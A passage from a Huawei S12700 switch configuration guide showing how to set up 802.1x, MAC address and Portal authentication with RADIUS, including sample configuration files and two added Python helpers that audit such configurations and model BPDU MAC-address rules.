[Switch-aaa] service-scheme sch1
[Switch-aaa-service-sch1] admin-user privilege level 15
[Switch-aaa-service-sch1] quit

# Apply the AAA authentication scheme, RADIUS server template, and service scheme to the
default common domain.
[Switch-aaa] domain default
[Switch-aaa-domain-default] authentication-scheme sch1
[Switch-aaa-domain-default] service-scheme sch1
[Switch-aaa-domain-default] radius-server 1
[Switch-aaa-domain-default] quit
[Switch-aaa] quit

# Set the NAC mode to unified.


[Switch] authentication unified-mode

NOTE

After the common mode is changed to unified mode, restart the device to make the configuration take effect.
By default, the unified mode is used.

# Enable 802.1x authentication on the interface.

l In the versions earlier than V200R009:


[Switch] interface gigabitethernet1/0/3
[Switch-GigabitEthernet1/0/3] authentication dot1x
[Switch-GigabitEthernet1/0/3] quit

l In V200R009 and later versions:


[Switch] dot1x-access-profile name d1
[Switch-dot1x-access-profile-d1] quit
[Switch] authentication-profile name p1
[Switch-authen-profile-p1] dot1x-access-profile d1
[Switch-authen-profile-p1] authentication mode multi-authen max-user 100
[Switch-authen-profile-p1] quit
[Switch] interface gigabitethernet1/0/3
[Switch-GigabitEthernet1/0/3] port link-type access
[Switch-GigabitEthernet1/0/3] port default vlan 10
[Switch-GigabitEthernet1/0/3] authentication-profile p1
[Switch-GigabitEthernet1/0/3] quit

Step 4 Verify the configuration.

# Choose Start > Run on a computer running the Windows operating system and enter cmd
to open the cmd window. Run the telnet command and enter the user name user1 and
password Huawei@1234 to log in to the device through Telnet.
C:\Documents and Settings\Administrator> telnet 10.1.2.10
Username:user1
Password:***********
<Switch>//The administrator successfully logs in.

# Run the test-aaa command to test whether an 802.1x user can pass the authentication.
[Switch] test-aaa liming Hello@5678 radius-template 1


# A user starts the 802.1x client on a terminal, and enters the user name liming and password
Hello@5678 for authentication. If the user name and password are correct, an authentication
success message is displayed on the client page. The user can access the network.
# After the user goes online, you can run the display access-user access-type dot1x
command to check online 802.1x user information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30
#
telnet server enable
#
authentication-profile name p1 //Available only in V200R009 and later versions
dot1x-access-profile d1
authentication mode multi-authen max-user 100
#
radius-server template 1
radius-server shared-key cipher %^%#9nP3;sDW-AN0f@H@S*l&\f{V=V_auKe|^YXy7}bU%^%#
radius-server authentication 10.1.6.6 1812 weight 80
#
aaa
authentication-scheme sch1
authentication-mode radius
service-scheme sch1
admin-user privilege level 15
domain default
authentication-scheme sch1
service-scheme sch1
radius-server 1
local-user user1 password irreversible-cipher %^%#,G8c3$Xso~0qP~%Bz/hY5~IR)oN~
$8}UEJ59Ho{C\U</DW6:w,q{4Q!r}!:H%^%#
local-user user1 privilege level 15
local-user user1 service-type telnet
#
interface Vlanif10
ip address 10.1.3.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif30
ip address 10.1.6.10 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 30
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 10
authentication dot1x //Available only in the versions earlier than V200R009
authentication-profile p1 //Available only in V200R009 and later versions
#
user-interface maximum-vty 15
user-interface vty 0 14


authentication-mode aaa
protocol inbound telnet
#
dot1x-access-profile name d1 //Available only in V200R009 and later versions
#
return
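An added example (not Huawei code) that audits a saved configuration of this kind for the settings the example relies on: AAA on the VTY lines, an explicit service-type for every local user, a RADIUS template with a shared key and a server, and a default domain and authentication profile whose references resolve. The sample is the configuration file above trimmed to those sections, with the cipher blobs replaced by placeholders; it assumes the one-space-per-level indentation VRP prints.

```python
import re

# Constructed input: this example's configuration file reduced to the audited sections,
# cipher blobs replaced by placeholders (they carry nothing an audit needs).
SAMPLE_CONFIG = """\
#
authentication-profile name p1
 dot1x-access-profile d1
#
radius-server template 1
 radius-server shared-key cipher %^%#<cipher-placeholder>%^%#
 radius-server authentication 10.1.6.6 1812 weight 80
#
aaa
 authentication-scheme sch1
  authentication-mode radius
 domain default
  authentication-scheme sch1
  radius-server 1
 local-user user1 password irreversible-cipher %^%#<cipher-placeholder>%^%#
 local-user user1 privilege level 15
 local-user user1 service-type telnet
#
interface GigabitEthernet1/0/3
 authentication-profile p1
#
user-interface vty 0 14
 authentication-mode aaa
 protocol inbound telnet
#
dot1x-access-profile name d1
#
"""


def parse_sections(text):
    """Split a VRP configuration into '#'-delimited sections of (indent depth, line)."""
    sections, current = [], []
    for raw in text.splitlines():
        line = raw.split("//")[0].rstrip()      # drop trailing // comments as in the file above
        if line.strip() == "#":
            if current:
                sections.append(current)
            current = []
        elif line.strip():
            current.append((len(line) - len(line.lstrip()), line.strip()))
    return sections + ([current] if current else [])


def children(section, context):
    """Lines indented under a depth-1 context line (e.g. 'domain default') of a section."""
    out, active = [], False
    for depth, text in section[1:]:
        if depth == 1:
            active = text == context
        elif active:
            out.append(text)
    return out


def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    heads = {s[0][1]: s for s in parse_sections(text)}
    findings = []
    # 1. VTY user interfaces must hand authentication to AAA (Step 2).
    for head, sec in heads.items():
        if head.startswith("user-interface vty"):
            lines = [t for _, t in sec]
            if "authentication-mode aaa" not in lines:
                findings.append(f"{head}: authentication-mode is not aaa")
            if "protocol inbound telnet" in lines:
                findings.append(f"{head}: Telnet management is cleartext (SSH is the default from V200R007)")
    aaa = heads.get("aaa", [])
    top = [t for d, t in aaa[1:] if d == 1]
    # 2. Every local user must carry an explicit service-type (Step 2).
    for user in {m.group(1) for t in top for m in [re.match(r"local-user (\S+) password", t)] if m}:
        if not any(t.startswith(f"local-user {user} service-type") for t in top):
            findings.append(f"local-user {user}: no service-type restriction")
    # 3. A RADIUS template needs a shared key and an authentication server (Step 3).
    templates = {h.split()[-1]: s for h, s in heads.items() if h.startswith("radius-server template")}
    for name, sec in templates.items():
        kinds = {t.split()[1] for _, t in sec[1:]}
        for needed in ("shared-key", "authentication"):
            if needed not in kinds:
                findings.append(f"radius-server template {name}: missing radius-server {needed}")
    # 4. domain default must bind a RADIUS scheme and an existing template (Step 3).
    for t in children(aaa, "domain default"):
        if t.startswith("authentication-scheme ") and "authentication-mode radius" not in children(aaa, t):
            findings.append(f"domain default: {t} is not RADIUS authentication")
        if t.startswith("radius-server ") and t.split()[1] not in templates:
            findings.append(f"domain default: references unknown {t}")
    # 5. An interface's authentication-profile, and its dot1x-access-profile, must exist.
    for head, sec in heads.items():
        for _, t in sec[1:]:
            if head.startswith("interface") and t.startswith("authentication-profile "):
                prof = heads.get(f"authentication-profile name {t.split()[1]}")
                if prof is None:
                    findings.append(f"{head}: unknown {t}")
                elif not any(f"dot1x-access-profile name {p.split()[1]}" in heads
                             for _, p in prof[1:] if p.startswith("dot1x-access-profile ")):
                    findings.append(f"{head}: {t} has no valid dot1x-access-profile")
    return findings
```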

10.2 Typical NAC Configuration (Common Mode)

10.2.1 Example for Configuring 802.1x Authentication to Control Internal User Access

802.1x Authentication Overview


802.1x is a port-based network access control protocol, and 802.1x authentication is one of
the NAC authentication modes. 802.1x authentication ensures the security of enterprise intranets.

802.1x authentication ensures high security; however, it requires that 802.1x client software
be installed on user terminals, resulting in inflexible network deployment. Another two NAC
authentication methods have their advantages and disadvantages: MAC address authentication
does not require client software installation, but MAC addresses must be registered on an
authentication server. Portal authentication also does not require client software installation
and provides flexible deployment, but it has low security.

As a result, 802.1x authentication is applied to scenarios with new networks, centralized user
distribution, and strict information security requirements. In addition, 802.1x authentication
supports MAC address bypass authentication so that the dumb terminals on 802.1x
authentication networks can be connected after passing authentication.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l If 802.1x authentication is enabled on an interface, the following commands cannot be
used on the same interface.

Command                              Function
mac-limit                            Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable         Disables MAC address learning on an interface.
port link-type dot1q-tunnel          Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan      Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                   Configures selective QinQ.
port-security enable                 Enables interface security.
mac-vlan enable                      Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable                Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
As shown in Figure 10-25, the terminals in an office are connected to the company's internal
network through the Switch. Unauthorized access to the internal network can damage the
company's service system and cause leakage of key information assets. Therefore, the
administrator requires that the Switch should control the users' network access rights to ensure
internal network security.

Figure 10-25 Networking diagram for configuring 802.1x authentication

[Figure: users and a printer connect through a LAN switch to GE1/0/1 (VLAN 10) of the Switch;
GE1/0/2 (VLAN 20) connects to the intranet and the RADIUS Server 192.168.2.30.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Configure 802.1x authentication on the Switch.
a. Enable 802.1x authentication to control network access rights of the employees in
the office.
b. Enable MAC address bypass authentication to authenticate terminals (such as
printers) that cannot install 802.1x authentication client software.


NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.
In this example, the LAN switch exists between the access switch Switch and users. To ensure that
users can pass 802.1x authentication, you must configure the EAP packet transparent transmission
function on the LAN switch.
l Method 1: The S5700 is used as an example of the LAN switch. Perform the following
operations:
1. Run the l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003
group-mac 0100-0000-0002 command in the system view of the LAN switch to configure the
LAN switch to transparently transmit EAP packets.
2. Run the l2protocol-tunnel user-defined-protocol 802.1x enable command on the interface
connecting to users and the interface connecting to the access switch to enable the Layer 2
protocol transparent transmission function.
l Method 2: This method is recommended when a large number of users exist or high network
performance is required.
1. Run the following commands in the system view:
l undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
l bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
l bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
l bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
l bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
2. (This step is mandatory when you switch from method 1 to method 2.) Run the undo
l2protocol-tunnel user-defined-protocol 802.1x enable command in the interface view to
delete the configuration of transparent transmission of 802.1x protocol packets.
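As an added example (not Huawei code), the following models the bpdu mac-address rules of Method 2 to check that 802.1x frames (destination 0180-c200-0003, the protocol-mac Method 1 tunnels) are no longer handled as BPDUs on the LAN switch while the other reserved addresses still are. The model assumes that a frame is treated as a BPDU when its destination matches (mac & mask) of any rule, and that the default rule set is exactly the rule the first command removes.

```python
# Assumed default rule set: exactly the rule that Method 2 removes first.
DEFAULT_RULES = [("0180-c200-0000", "ffff-ffff-fff0")]
EAPOL_PAE_GROUP = "0180-c200-0003"   # destination MAC of 802.1x (EAPOL) frames

# The five commands from Method 2, as typed in the system view of the LAN switch.
METHOD2_COMMANDS = """
undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8
"""


def mac_to_int(mac):
    return int(mac.replace("-", "").replace(":", ""), 16)


def int_to_mac(value):
    return "-".join(f"{(value >> shift) & 0xFFFF:04x}" for shift in (32, 16, 0))


def apply_commands(rules, commands):
    """Apply 'bpdu mac-address' / 'undo bpdu mac-address' lines to a (mac, mask) rule list."""
    rules = [(mac_to_int(m), mac_to_int(k)) for m, k in rules]
    for line in commands.strip().splitlines():
        parts = line.split()
        if parts[:3] == ["undo", "bpdu", "mac-address"]:
            target = (mac_to_int(parts[3]), mac_to_int(parts[4]))
            rules = [r for r in rules if r != target]
        elif parts[:2] == ["bpdu", "mac-address"]:
            rules.append((mac_to_int(parts[2]), mac_to_int(parts[3])))
        else:
            raise ValueError(f"unrecognised command: {line}")
    return [(int_to_mac(m), int_to_mac(k)) for m, k in rules]


def is_trapped_as_bpdu(rules, dst_mac):
    """True if a frame to dst_mac matches a rule and is therefore handled as a BPDU, not forwarded."""
    dst = mac_to_int(dst_mac)
    return any(dst & mac_to_int(k) == mac_to_int(m) & mac_to_int(k) for m, k in rules)


def trapped_in_reserved_block(rules):
    """The addresses 0180-c200-0000 .. 0180-c200-000f that `rules` still trap."""
    base = mac_to_int("0180-c200-0000")
    return [int_to_mac(base + i) for i in range(16)
            if is_trapped_as_bpdu(rules, int_to_mac(base + i))]
```

The four replacement masks cover 0000-0001, 0002, 0004-0007 and 0008-000f, so only 0180-c200-0003 drops out of the trapped set.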

Procedure
Step 1 Create VLANs and configure the VLAN allowed by the interface to ensure network
communication.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, set GE1/0/1 connecting to users as an access interface, and add GE1/0/1 to
VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs according to the actual situation. In this example, users are
added to VLAN 10.

# On the Switch, set GE1/0/2 connecting to the RADIUS server as an access interface, and
add GE1/0/2 to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.


# Create and configure the RADIUS server template rd1.


[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create AAA scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create authentication domain isp1, and bind AAA scheme abc and RADIUS server
template rd1 to authentication domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure the default domain isp1 in the system view. When a user enters the user name in
the format of user@isp1, the user is authenticated in the authentication domain isp1. If the
user name does not carry the domain name or carries a nonexistent domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure 802.1x authentication.


# Switch the NAC mode to common mode.
[Switch] undo authentication unified-mode
Warning: Switching the authentication mode will take effect after system restart
. Some configurations are invalid after the mode is switched. For the invalid co
mmands, see the user manual. Save the configuration file and reboot now? [Y/N] y

NOTE

l By default, the NAC unified mode is used.


l After the unified mode is switched to common mode, you must save the configuration and restart the
device to make each function in the new configuration mode take effect. In versions earlier than
V200R007C00, you need to manually run the commands for saving the configuration and restarting the
device.

# Enable 802.1x authentication globally and on an interface.


<Switch> system-view
[Switch] dot1x enable
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] dot1x enable
[Switch-GigabitEthernet1/0/1] dot1x authentication-method eap

# Configure MAC address bypass authentication.


[Switch-GigabitEthernet1/0/1] dot1x mac-bypass

Step 4 Verify the configuration.


1. Run the display dot1x command to check the 802.1x authentication configuration. The
command output (802.1x protocol is Enabled) shows that the 802.1x authentication has
been enabled on the interface GE1/0/1.
2. The user starts the 802.1x client on the terminal, and enters the user name and password
for authentication.


3. If the user name and password are correct, an authentication success message is
displayed on the client page. The user can access the network.
4. After the user goes online, you can run the display access-user command on the device
to check the online 802.1x user information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
undo authentication unified-mode
#
domain isp1
#
dot1x enable
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
dot1x mac-bypass
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return

Related Content
Videos
Configure 802.1x Authentication

10.2.2 Example for Configuring MAC Address Authentication to Control Internal User Access
MAC Address Authentication Overview
As one of NAC authentication modes, MAC address authentication controls a user's network
access rights based on the user's interface and MAC address. The user does not need to install
any client software. MAC address authentication ensures security of enterprise intranets.
In MAC address authentication, client software does not need to be installed on user
terminals, but MAC addresses must be registered on servers, resulting in complex
management. Another two NAC authentication methods have their advantages and
disadvantages: 802.1x authentication ensures high security, but it requires that 802.1x client
software be installed on user terminals, causing inflexible network deployment. Portal
authentication also does not require client software installation and provides flexible
deployment, but it has low security.
MAC address authentication is applied to access authentication scenarios of dumb terminals
such as printers and fax machines.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l The mac-authen command cannot be used together with the following commands on the
same interface.

Command                              Function
mac-limit                            Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable         Disables MAC address learning on an interface.
port link-type dot1q-tunnel          Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan      Configures VLAN mapping on an interface.
port vlan-mapping vlan inner-vlan
port vlan-stacking                   Configures selective QinQ.
port-security enable                 Enables interface security.
mac-vlan enable                      Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable                Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
As shown in Figure 10-26, the terminals in the physical access control department are
connected to the company's internal network through the Switch. Unauthorized access to the
internal network can damage the company's service system and cause leakage of key
information assets. Therefore, the administrator requires that the Switch should control the
users' network access rights to ensure internal network security.


Figure 10-26 Configuring MAC address authentication to control internal user access

[Figure: printers in the physical access control department connect through a LAN switch to
GE1/0/1 (VLAN 10) of the Switch; GE1/0/2 (VLAN 20) connects to the network and the RADIUS
Server 192.168.2.30.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Enable MAC address authentication so that the Switch can control network access rights
of the dumb terminals in the physical access control department.
NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.

Procedure
Step 1 Create VLANs and configure the VLAN allowed by the interface to ensure network
communication.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, set GE1/0/1 connecting to users as an access interface, and add GE1/0/1 to
VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs according to the actual situation. In this example, users are
added to VLAN 10.

# On the Switch, set GE1/0/2 connecting to the RADIUS server as an access interface, and
add GE1/0/2 to VLAN 20.

[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.
# Create and configure the RADIUS server template rd1.
[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create AAA scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create authentication domain isp1, and bind AAA scheme abc and RADIUS server
template rd1 to authentication domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure the default domain isp1 in the system view. When a user enters the user name in
the format of user@isp1, the user is authenticated in the authentication domain isp1. If the
user name does not carry the domain name or carries a nonexistent domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure MAC address authentication.


# Switch the NAC mode to common mode.
[Switch] undo authentication unified-mode
Warning: Switching the authentication mode will take effect after system restart
. Some configurations are invalid after the mode is switched. For the invalid co
mmands, see the user manual. Save the configuration file and reboot now? [Y/N] y

NOTE

l By default, the NAC unified mode is used.


l After the unified mode is switched to common mode, you must save the configuration and restart the
device to make each function in the new configuration mode take effect. In versions earlier than
V200R007C00, you need to manually run the commands for saving the configuration and restarting the
device.

# Enable MAC address authentication globally and on the interface.


<Switch> system-view
[Switch] mac-authen
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] mac-authen
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.


1. Run the display mac-authen command to check the MAC address authentication
configuration. The command output (MAC address authentication is enabled) shows
that MAC address authentication has been enabled on the interface GE1/0/1.


2. After the user starts the terminal, the device automatically obtains the terminal MAC
address and uses it as the user name and password for authentication.
3. The user can access the network after the authentication succeeds.
4. After the user goes online, you can run the display access-user command on the device
to check the online MAC address authentication user information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
undo authentication unified-mode
#
domain isp1
#
mac-authen
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
mac-authen
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return

10.2.3 Example for Configuring Portal Authentication to Control Internal User Access

Portal Authentication Overview


As one of NAC authentication modes, Portal authentication is also called web authentication.
Generally, Portal authentication websites are also called Portal websites. When users go
online, they must be authenticated on Portal websites. The users can use network resources
only after they pass the authentication.

Portal authentication cannot ensure high security, but it does not require client software
installation and provides flexible deployment. Another two NAC authentication methods have
their advantages and disadvantages: 802.1x authentication ensures high security, but it
requires that 802.1x client software be installed on user terminals, causing inflexible network
deployment. MAC address authentication does not require client software installation, but
MAC addresses must be registered on an authentication server, resulting in complex
management.

Portal authentication is applied to scenarios where a large number of scattered users such as
company visitors move frequently.

Configuration Notes
This example applies to all S12700 versions.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-27, the terminals in the visitor area are connected to the company's
internal network through the Switch. Unauthorized access to the internal network can damage
the company's service system and cause leakage of key information assets. Therefore, the
administrator requires that the Switch should control the users' network access rights to ensure
internal network security.

Figure 10-27 Configuring Portal authentication to control internal user access

[Figure: visitors in the visitor area connect through a LAN switch to GE1/0/1 (VLAN 10) of
the Switch; GE1/0/2 (VLAN 20) connects to the network, the RADIUS Server 192.168.2.30 and
the Portal Server 192.168.2.20.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain. Bind the RADIUS server template and AAA scheme to the authentication
domain so that the Switch can authenticate access users through the RADIUS server.
2. Configure Portal authentication so that the device can control network access rights of
the visitors in the visitor areas.
a. Create and configure a Portal server template to ensure normal information
exchange between the device and the Portal server.
b. Enable Portal authentication to authenticate access users.


c. Configure a shared key that the device uses to exchange information with the Portal
server to improve communication security.
NOTE

Before configuring this example, ensure that devices can communicate with each other in the network.

Procedure
Step 1 Create VLANs and configure the VLAN allowed by the interface to ensure network
communication.
# Create VLAN 10 and VLAN 20.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20

# On the Switch, set GE1/0/1 connecting to users as an access interface, and add GE1/0/1 to
VLAN 10.
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit

NOTE

Configure the interface type and VLANs according to the actual situation. In this example, users are
added to VLAN 10.

# On the Switch, set GE1/0/2 connecting to the RADIUS server as an access interface, and
add GE1/0/2 to VLAN 20.
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Create and configure a RADIUS server template, an AAA scheme, and an authentication
domain.
# Create and configure the RADIUS server template rd1.
[Switch] radius-server template rd1
[Switch-radius-rd1] radius-server authentication 192.168.2.30 1812
[Switch-radius-rd1] radius-server shared-key cipher Huawei@2012
[Switch-radius-rd1] quit

# Create AAA scheme abc and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme abc
[Switch-aaa-authen-abc] authentication-mode radius
[Switch-aaa-authen-abc] quit

# Create authentication domain isp1, and bind AAA scheme abc and RADIUS server
template rd1 to authentication domain isp1.
[Switch-aaa] domain isp1
[Switch-aaa-domain-isp1] authentication-scheme abc
[Switch-aaa-domain-isp1] radius-server rd1
[Switch-aaa-domain-isp1] quit
[Switch-aaa] quit

# Configure the default domain isp1 in the system view. When a user enters the user name in
the format of user@isp1, the user is authenticated in the authentication domain isp1. If the
user name does not carry the domain name or carries a nonexistent domain name, the user is
authenticated in the default domain.
[Switch] domain isp1

Step 3 Configure Portal authentication.

# Switch the NAC mode to common mode.
[Switch] undo authentication unified-mode
Warning: Switching the authentication mode will take effect after system restart. Some configurations are invalid after the mode is switched. For the invalid commands, see the user manual. Save the configuration file and reboot now? [Y/N] y

NOTE

l By default, the NAC unified mode is used.
l After the unified mode is switched to common mode, you must save the configuration and restart the
device to make each function in the new configuration mode take effect. In versions earlier than
V200R007C00, you need to manually run the commands for saving the configuration and restarting the
device.

# Create and configure a Portal server template abc.


<Switch> system-view
[Switch] web-auth-server abc
[Switch-web-auth-server-abc] server-ip 192.168.2.20
[Switch-web-auth-server-abc] port 50200
[Switch-web-auth-server-abc] url http://192.168.2.20:8080/webagent
[Switch-web-auth-server-abc] quit

NOTE

Ensure that the port number configured on the device is the same as that used by the Portal server.

# Enable Portal authentication.


[Switch] interface vlanif 10
[Switch-Vlanif10] web-auth-server abc direct
[Switch-Vlanif10] quit

# Set the shared key in cipher text to Huawei@123.


[Switch] web-auth-server abc
[Switch-web-auth-server-abc] shared-key cipher Huawei@123
[Switch-web-auth-server-abc] quit

NOTE

In this example, users are allocated static IP addresses. If the users obtain IP addresses through DHCP and the
DHCP server is upstream connected to Switch, use the portal free-rule command to create authentication-
free rules and ensure that the DHCP server is included in the authentication-free rules.
In addition, if the URL of Portal server needs to be analyzed by DNS and the DNS server is upstream
connected to Switch, you also need to create authentication-free rules and ensure that the DNS server is
included in the authentication-free rules.

Step 4 Verify the configuration.


1. Run the display portal and display web-auth-server configuration commands to
check the Portal authentication configuration. The command output (web-auth-server
layer2(direct)) shows that the Portal server template has been bound to the interface
vlanif10.
2. After starting the browser and entering any network address, the user is redirected to the
Portal authentication page. The user then enters the user name and password for
authentication.


3. If the user name and password are correct, an authentication success message is
displayed on the Portal authentication page. The user can access the network.
4. After the user goes online, you can run the display access-user command on the device
to check the online Portal authentication user information.

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
undo authentication unified-mode
#
domain isp1
#
radius-server template rd1
radius-server shared-key cipher %^%#Q75cNQ6IF(e#L4WMxP~%^7'u17,]D87GO{"[o]`D%^%#
radius-server authentication 192.168.2.30 1812 weight 80
#
web-auth-server abc
server-ip 192.168.2.20
port 50200
shared-key cipher %^%#t:hJ@gD7<+G&,"Y}Y[VP4\foQ&og/Gg(,J4#\!gD%^%#
url http://192.168.2.20:8080/webagent
#
aaa
authentication-scheme abc
authentication-mode radius
domain isp1
authentication-scheme abc
radius-server rd1
#
interface Vlanif10
web-auth-server abc direct
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
return

10.3 Typical NAC Configuration (Unified Mode) (V200R007C00 and Earlier Versions, V200R008C00)


10.3.1 Example for Configuring 802.1x Authentication to Control Internal User Access
802.1x Authentication Overview
802.1x is a port-based network access control protocol, and 802.1x authentication is one of the
NAC authentication modes used to secure enterprise intranets.
802.1x authentication provides high security; however, it requires that 802.1x client software
be installed on user terminals, which makes network deployment less flexible. The other two NAC
authentication methods have their own advantages and disadvantages: MAC address authentication
does not require client software, but MAC addresses must be registered on an authentication
server. Portal authentication also does not require client software and is flexible to deploy,
but it provides low security.
As a result, 802.1x authentication is applied to scenarios with new networks, centralized user
distribution, and strict information security requirements.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE
To know details about software mappings, see Switch Software Mapping Search.
l If 802.1x authentication is enabled on an interface, the following commands cannot be
used on the same interface.
Command | Function
mac-limit | Sets the maximum number of MAC addresses that can be learned by an interface.
mac-address learning disable | Disables MAC address learning on an interface.
port link-type dot1q-tunnel | Sets the link type of an interface to QinQ.
port vlan-mapping vlan map-vlan / port vlan-mapping vlan inner-vlan | Configures VLAN mapping on an interface.
port vlan-stacking | Configures selective QinQ.
port-security enable | Enables interface security.
mac-vlan enable | Enables MAC address-based VLAN assignment on an interface.
ip-subnet-vlan enable | Enables IP subnet-based VLAN assignment on an interface.

Networking Requirements
As shown in Figure 10-28, the terminals in an office are connected to the company's internal
network through the Switch. Unauthorized access to the internal network can damage the
company's service system and cause leakage of key information assets. Therefore, the
administrator requires that the Switch should control the users' network access rights to ensure
internal network security.

Figure 10-28 Configuring 802.1x authentication to control internal user access
